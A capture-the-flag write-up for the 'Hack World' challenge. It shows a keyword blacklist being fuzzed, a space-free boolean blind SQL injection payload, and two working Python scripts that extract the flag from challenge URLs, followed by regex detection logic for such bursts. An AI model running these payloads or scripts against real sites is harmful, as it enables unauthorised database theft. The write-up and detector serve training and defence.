1. Hack World

1. Overall flow

  1. Fuzz the blacklist
  2. Boolean-based blind injection

2. Challenge analysis

  1. Normal SQL query probes
1'
1' or 1=1#
1=1

Filtering is in place. Further fuzzing shows that spaces are filtered, and the backend statement evaluates (1=1) (the page returns the "true" response).
payload:

if(substr((select(flag)from(flag)),1,1)='f',1,2)
  1. Both the table name flag and the column name flag are given by the challenge

If the condition is true, the expression evaluates to 1 and the page returns "Hello, glzjin wants a girlfriend."
If the condition is false, the expression evaluates to 2 and the page returns "Do you want to be my girlfriend?"
The blind injection script is as follows:

import requests

# Challenge instance URL as given in the writeup
url = "http://3a375194-a3f5-4e1e-afe4-8e997044d03e.node2.buuoj.cn.wetolink.com/index.php"
flag = ""
# Candidate characters (the '-' in this set later turned out to be filtered by the backend)
charset = "abcdefghijklmnopqrstuvwxyz0123456789-_{}"
for i in range(60):
    for j in charset:
        # Probe position i+1 of the flag; "Hello" appears in the response only when the guess is right
        payload = "if(substr((select(flag)from(flag)),{},1)='{}',1,2)".format(i + 1, j)
        data = {'id': payload}
        a = requests.post(url, data=data)
        if "Hello" in a.text:
            flag = flag + j
            print(flag)
            break

This produced a flag, but submitting it failed. Looking closer, the '-' characters in the flag had not been recovered. Testing in the challenge showed that '-' is filtered as well (lousy challenge author). After some thought I improved the script to iterate over a Python list of ASCII codes instead of literal characters, and finally got the full flag. Next time, when doing boolean-based blind injection, it is better to compare ASCII values from the start; brute-forcing literal characters becomes a hassle as soon as one of them is filtered.

import requests

# Challenge instance URL as given in the writeup
url = "http://b9be93db-7e33-4e8d-9dd0-5dc5e814f15c.node2.buuoj.cn.wetolink.com/index.php"
flag = ""
# ASCII codes for '-', '0'-'9', 'a'-'f', '{' and '}'; comparing codes avoids sending the filtered '-' literally
codes = [45, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102, 123, 125]
for i in range(60):
    for j in codes:
        # Probe position i+1 of the flag by its ASCII value instead of the literal character
        payload = "if(ascii(substr((select(flag)from(flag)),{},1))='{}',1,2)".format(i + 1, j)
        data = {'id': payload}
        a = requests.post(url, data=data)
        if "Hello" in a.text:
            flag = flag + chr(j)
            print(flag)
            break
# First run (with '-' filtered): flag{fde6135051284b1792759b37992f15a8}
# Second run (ASCII comparison): flag{fde61350-5128-4b17-9275-9b37992f15a8}
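From the defender's side, the two payload shapes above are easy to spot in request logs: a keyword blacklist missed them, but the id parameter stops being a bare integer and the same space-free function-call template repeats with only the offset and probe value changing. The following detection logic is an added example and not part of the original writeup; the client addresses and request list are constructed sample data.

```python
import re
from collections import Counter, defaultdict

# Legitimate ids on this endpoint are bare integers.
INT_ONLY = re.compile(r"^\d+$")
# Quote/comment markers or the space-free function-call style (if(, substr(, ascii(, select(, from( ).
SQLI_HINT = re.compile(r"'|#|--|\b(?:if|substr|substring|ascii|select|from)\s*\(", re.IGNORECASE)

def is_suspicious(id_value):
    """True when id is not a plain integer and carries an injection marker."""
    return not INT_ONLY.match(id_value) and SQLI_HINT.search(id_value) is not None

def template(id_value):
    """Collapse what a blind-injection loop varies: quoted probe characters and numbers
    (offsets, ASCII codes), so every iteration of one loop maps to the same template."""
    t = re.sub(r"'[^']*'", "'S'", id_value)
    t = re.sub(r"\d+", "N", t)
    return t.lower()

def blind_injection_bursts(events, threshold=5):
    """events: iterable of (client, id_value). Returns {client: hits} for clients that
    sent at least `threshold` suspicious requests sharing one payload template."""
    per_client = defaultdict(Counter)
    for client, value in events:
        if is_suspicious(value):
            per_client[client][template(value)] += 1
    return {c: max(t.values()) for c, t in per_client.items() if max(t.values()) >= threshold}

# Constructed sample traffic (not captured from the challenge): one ordinary user and one
# client walking the first characters of a column with both payload shapes used above.
SAMPLE_EVENTS = [
    ("10.0.0.9", "1"),
    ("10.0.0.9", "42"),
    ("10.0.0.5", "if(substr((select(flag)from(flag)),1,1)='f',1,2)"),
    ("10.0.0.5", "if(substr((select(flag)from(flag)),1,1)='g',1,2)"),
    ("10.0.0.5", "if(substr((select(flag)from(flag)),2,1)='l',1,2)"),
    ("10.0.0.5", "if(ascii(substr((select(flag)from(flag)),3,1))='97',1,2)"),
    ("10.0.0.5", "if(ascii(substr((select(flag)from(flag)),3,1))='98',1,2)"),
    ("10.0.0.5", "if(ascii(substr((select(flag)from(flag)),3,1))='103',1,2)"),
]

if __name__ == "__main__":
    print(blind_injection_bursts(SAMPLE_EVENTS, threshold=3))  # {'10.0.0.5': 3}
```

The template check is what makes this robust: changing the probe character or switching from substr() to ascii() does not change the per-loop signature, whereas a keyword blacklist has to anticipate every variant.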
Last modification:February 5th, 2020 at 03:22 pm